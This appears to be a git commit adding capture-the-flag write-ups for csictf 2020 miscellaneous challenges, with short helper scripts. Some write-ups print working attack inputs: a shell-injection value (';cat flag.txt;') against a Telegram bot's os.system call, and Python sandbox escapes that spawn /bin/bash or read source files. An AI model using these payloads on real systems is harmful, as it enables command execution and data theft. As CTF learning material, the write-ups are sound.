Added Miscellaneous Challenges

This commit is contained in:
rishitsaiya 2020-07-31 18:23:33 +05:30
parent 783e212ca7
commit aca8780568
11 changed files with 556 additions and 0 deletions

View File

@ -0,0 +1,34 @@
## BroBot
The main idea finding the flag is just using Bot to get the flag.
#### Step-1:
I tried `/about` to get information about the bot and got this:
```python
CTF - https://ctf.csivit.com/
Our Team - https://ctftime.org/team/77170/
Homepage - https://csivit.com/
Contribute - https://github.com/alias-rahil/speakingbot.git/
CTF Support - https://discord.com/invite/9wHPB2B/
BoT Support - @alias_rahil
```
#### Step-2:
I used `/text2voice`. I linked to the source of the bot. It writes our text as `arg` for `echo` in a bash script. Then pipes the script's output to `espeak` to get the sound.
#### Step-3:
I got this from [writeup](https://github.com/goswami-rahul/ctf/tree/master/csictf2020/brobot) to execute.
```bash
fs = open(f"/home/ctf/{update.message.from_user.id}", "w")
fs.write(f"echo '{text}'")
fs.close()
os.system(
f"su ctf -c 'sh /home/ctf/{update.message.from_user.id} | espeak -w /home/ctf/{update.message.from_user.id}.wav --stdin'"
)
```
Then a simple `';cat flag.txt;'` gives us the answer.
#### Step-4:
Finally the flag becomes:
`csictf{ai_will_take_over_the_world}`

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

View File

@ -0,0 +1,84 @@
## Escape Plan
The main idea finding the flag is just spawning into a sandbox.
#### Step-1:
When we run `nc chall.csivit.com 30419`, we are greeted with,
```bash
Welcome to cipher decoder, an open-source script in python!
EXAMPLES:
shift_cipher_key('hello', 25)
shift_cipher_bruteforce('hello')
encrypt_vigenere('TEXT', 'KEY')
decrypt_vigenere('DIVD', 'KEY')
Currently supported ciphers:
shift_cipher_key(text, shift)
shift_cipher_bruteforce(text)
encrypt_vigenere(plaintext, key)
decrypt_vigenere(ciphertext, key)
To exit:
exit()
I am constantly trying to make this cipher decoder better and more secure! Help me add support to more ciphers by submitting a PR!
Hope it helps you!
```
#### Step-2:
So to escape, I tried `eval('__import__("os").system("/bin/bash")')` and I was in.
Once in I directly checked, `ls -al`, and I got this:
```bash
total 20
drwxr-x--- 1 root ctf 4096 Jul 22 06:35 .
drwxr-xr-x 1 root root 4096 Jul 26 16:58 ..
drwxr-x--- 1 root ctf 4096 Jul 22 06:27 .git
-rwxr-x--- 1 root ctf 2654 Jul 22 06:27 crypto.py
-rwxr-x--- 1 root ctf 52 Jul 22 06:27 start.sh
```
#### Step-3:
I checked other files, but I will stick to procedure here. Since the description involved a PR, I checked `.git` first by `cd .git`. I got usual files:
```bash
COMMIT_EDITMSG
HEAD
config
description
hooks
index
info
logs
objects
packed-refs
refs
```
At this point, I generally check `logs` to get an overview over the changes in the repo, but here the permission was denied.
#### Step-4:
So, I checked config files by `cat config` and I got this:
```bash
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/alias-rahil/crypto-cli
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
```
#### Step-4:
Now, I got a URL and checked at the given head and got the flag.
<img src="Flag.png">
#### Step-5:
Finally the flag becomes:
`csictf{2077m4y32_h45_35c4p3d}`

View File

@ -0,0 +1,226 @@
## Friends
The main idea finding the flag is just parsing the input smartly.
#### Step-1:
When we download `namo.py`, we are greeted with:
```python
import math
import sys
def fancy(x):
a = (1/2) * x
b = (1/2916) * ((27 * x - 155) ** 2)
c = 4096 / 729
d = (b - c) ** (1/2)
e = (a - d - 155/54) ** (1/3)
f = (a + d - 155/54) ** (1/3)
g = e + f + 5/3
return g
def notfancy(x):
return x**3 - 5*x**2 + 3*x + 10
def mathStuff(x):
if (x < 3 or x > 100):
exit()
y = fancy(notfancy(x))
if isinstance(y, complex):
y = float(y.real)
y = round(y, 0)
return y
print("Enter a number: ")
sys.stdout.flush()
x = round(float(input()), 0)
if x == mathStuff(x):
print('Fail')
sys.stdout.flush()
else:
print(open('namo.txt').read())
sys.stdout.flush()
```
#### Step-2:
So I tried basic numbers and it worked according to the given algorithm but however, we could try a float `nan` and then I ran it along with the remote server to enter the `else` condition at the end.
```bash
echo nan | nc chall.csivit.com 30425
```
Output:
```bash
Enter a number:
Mitrooon
bhaiyo aur behno "Enter a number"
mann ki baat nambar
agar nambar barabar 1 hai {
bhaiyo aur behno "s"
}
nahi toh agar nambar barabar 13 hai {
bhaiyo aur behno "_"
}
nahi toh agar nambar barabar 15 hai {
bhaiyo aur behno "5"
}
nahi toh agar nambar barabar 22 hai {
bhaiyo aur behno "4"
}
nahi toh agar nambar barabar 28 hai {
bhaiyo aur behno "k"
}
nahi toh agar nambar barabar 8 hai {
bhaiyo aur behno "y"
}
nahi toh agar nambar barabar 17 hai {
bhaiyo aur behno "4"
}
nahi toh agar nambar barabar 9 hai {
bhaiyo aur behno "_"
}
nahi toh agar nambar barabar 4 hai {
bhaiyo aur behno "t"
}
nahi toh agar nambar barabar 3 hai {
bhaiyo aur behno "c"
}
nahi toh agar nambar barabar 20 hai {
bhaiyo aur behno "r"
}
nahi toh agar nambar barabar 12 hai {
bhaiyo aur behno "n"
}
nahi toh agar nambar barabar 0 hai {
bhaiyo aur behno "c"
}
nahi toh agar nambar barabar 23 hai {
bhaiyo aur behno "t"
}
nahi toh agar nambar barabar 27 hai {
bhaiyo aur behno "0"
}
nahi toh agar nambar barabar 10 hai {
bhaiyo aur behno "n"
}
nahi toh agar nambar barabar 11 hai {
bhaiyo aur behno "4"
}
nahi toh agar nambar barabar 7 hai {
bhaiyo aur behno "m"
}
nahi toh agar nambar barabar 25 hai {
bhaiyo aur behno "c"
}
nahi toh agar nambar barabar 24 hai {
bhaiyo aur behno "_"
}
nahi toh agar nambar barabar 6 hai {
bhaiyo aur behno "{"
}
nahi toh agar nambar barabar 16 hai {
bhaiyo aur behno "_"
}
nahi toh agar nambar barabar 18 hai {
bhaiyo aur behno "_"
}
nahi toh agar nambar barabar 2 hai {
bhaiyo aur behno "i"
}
nahi toh agar nambar barabar 5 hai {
bhaiyo aur behno "f"
}
nahi toh agar nambar barabar 19 hai {
bhaiyo aur behno "g"
}
nahi toh agar nambar barabar 14 hai {
bhaiyo aur behno "1"
}
nahi toh agar nambar barabar 21 hai {
bhaiyo aur behno "3"
}
nahi toh agar nambar barabar 26 hai {
bhaiyo aur behno "0"
}
nahi toh agar nambar barabar 29 hai {
bhaiyo aur behno "}"
}
nahi toh {
bhaiyo aur behno ""
}
achhe din aa gaye
```
#### Step-3:
Simple substitution like 0=c, 1=s, 2=i in the context of flag like `csictf{`, would also work. Instead I got this script to get the flag.
```bash
echo nan | nc chall.csivit.com 30425 | grep -A1 'hai {' | sed 's/agar nambar barabar //' | sed 's/nahi toh //' | sed 's/ hai {$/ =/' | sed 's/^\tbhaiyo aur behno \"//' | sed 's/\"$//' | sed 's/--//' | sed ':a;N;$!ba;s/=\n/ /g' | sort -n | uniq | awk '{print $2}' | tr -d '\n'; echo ''
```
This is a 1 liner and we get the flag after this.
#### Step-5:
Finally the flag becomes:
`csictf{my_n4n_15_4_gr34t_c00k}`

View File

@ -0,0 +1,38 @@
import math
import sys
def fancy(x):
a = (1/2) * x
b = (1/2916) * ((27 * x - 155) ** 2)
c = 4096 / 729
d = (b - c) ** (1/2)
e = (a - d - 155/54) ** (1/3)
f = (a + d - 155/54) ** (1/3)
g = e + f + 5/3
return g
def notfancy(x):
return x**3 - 5*x**2 + 3*x + 10
def mathStuff(x):
if (x < 3 or x > 100):
exit()
y = fancy(notfancy(x))
if isinstance(y, complex):
y = float(y.real)
y = round(y, 0)
return y
print("Enter a number: ")
sys.stdout.flush()
x = round(float(input()), 0)
if x == mathStuff(x):
print('Fail')
sys.stdout.flush()
else:
print(open('namo.txt').read())
sys.stdout.flush()

View File

@ -0,0 +1,51 @@
## Machine Fix
The main idea finding the flag is just understanding the algorithm.
#### Step-1:
After I downloaded `code.py`, I tried to understand the workflow here:
```python
def convert (n):
if n == 0:
return '0'
nums = []
while n:
n, r = divmod(n, 3)
nums.append(str(r))
return ''.join(reversed(nums))
count=0
n=1
while(n<=523693181734689806809285195318):
str1=convert(n)
str2=convert(n-1)
str2='0'*(len(str1)-len(str2))+str2
for i in range(len(str1)):
if(str1[i]!=str2[i]):
count+=1
n+=1
print(count)
```
#### Step-2:
For every number n, n and n - 1 are converted to base 3 & then, the program compare the digits, the number of differences is added to total.
So I wrote a simple `flag.py` script to get flag:
```python
def flag(n):
sum = 0
while (n > 0):
sum += n
n //= 3
return sum
print(flag(523693181734689806809285195318))
```
On running it by `python3 flag.py`
#### Step-3:
Finally the flag becomes:
`csictf{785539772602034710213927792950}`

View File

@ -0,0 +1,21 @@
def convert (n):
if n == 0:
return '0'
nums = []
while n:
n, r = divmod(n, 3)
nums.append(str(r))
return ''.join(reversed(nums))
count=0
n=1
while(n<=523693181734689806809285195318):
str1=convert(n)
str2=convert(n-1)
str2='0'*(len(str1)-len(str2))+str2
for i in range(len(str1)):
if(str1[i]!=str2[i]):
count+=1
n+=1
print(count)

View File

@ -0,0 +1,8 @@
def flag(n):
sum = 0
while (n > 0):
sum += n
n //= 3
return sum
print(flag(523693181734689806809285195318))

Binary file not shown.

After

Width:  |  Height:  |  Size: 156 KiB

View File

@ -0,0 +1,15 @@
## No DIStractions
The main idea finding the flag is getting the flag from Discord Bot.
#### Step-1:
The tag `Discord` clearly implies that you have to check something out there. So, I went to misc channel and checked out this bot called `Kuwu`.
#### Step-2:
After trying `flag`, `./flag`, etc., it worked on `.flag`.
<img src ="Flag.png">
#### Step-3:
Finally the flag becomes:
`csictf{m0r3_huMaN_than_Y0u}`

View File

@ -0,0 +1,79 @@
## Prison Break
The main idea finding the flag is just escaping Python Sandbox.
#### Step-1:
After I ran `nc chall.csivit.com 30407`, we get this a python sandbox.
I tried various commands like flag and ctf and all, but nothing worked.
#### Step-2:
Thanks to organiser, they gave some hint: https://ctf-wiki.github.io/ctf-wiki/pwn//linux/sandbox/python-sandbox-escape/
#### Step-3:
There I got this 1 liner to escape the sandbox.
**Payload:**
```python
print(().__class__.__bases__[0].__subclasses__()[40](__file__).read())
```
I got the source code, which had the flag.
```python
#!/usr/bin/python
import sys
class Sandbox(object):
def execute(self, code_string):
exec(code_string)
sys.stdout.flush()
sandbox = Sandbox()
_raw_input = raw_input
main = sys.modules["__main__"].__dict__
orig_builtins = main["__builtins__"].__dict__
builtins_whitelist = set((
#exceptions
'ArithmeticError', 'AssertionError', 'AttributeError', 'Exception',
#constants
'False', 'None', 'True',
#types
'basestring', 'bytearray', 'bytes', 'complex', 'dict',
#functions
'abs', 'bin', 'dir', 'help'
# blocked: eval, execfile, exit, file, quit, reload, import, etc.
))
for builtin in orig_builtins.keys():
if builtin not in builtins_whitelist:
del orig_builtins[builtin]
print("Find the flag.")
sys.stdout.flush()
def flag_function():
flag = "csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}"
while 1:
try:
sys.stdout.write(">>> ")
sys.stdout.flush()
code = _raw_input()
sandbox.execute(code)
except Exception:
print("You have encountered an error.")
sys.stdout.flush()
```
#### Step-4:
Finally the flag becomes:
`csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}`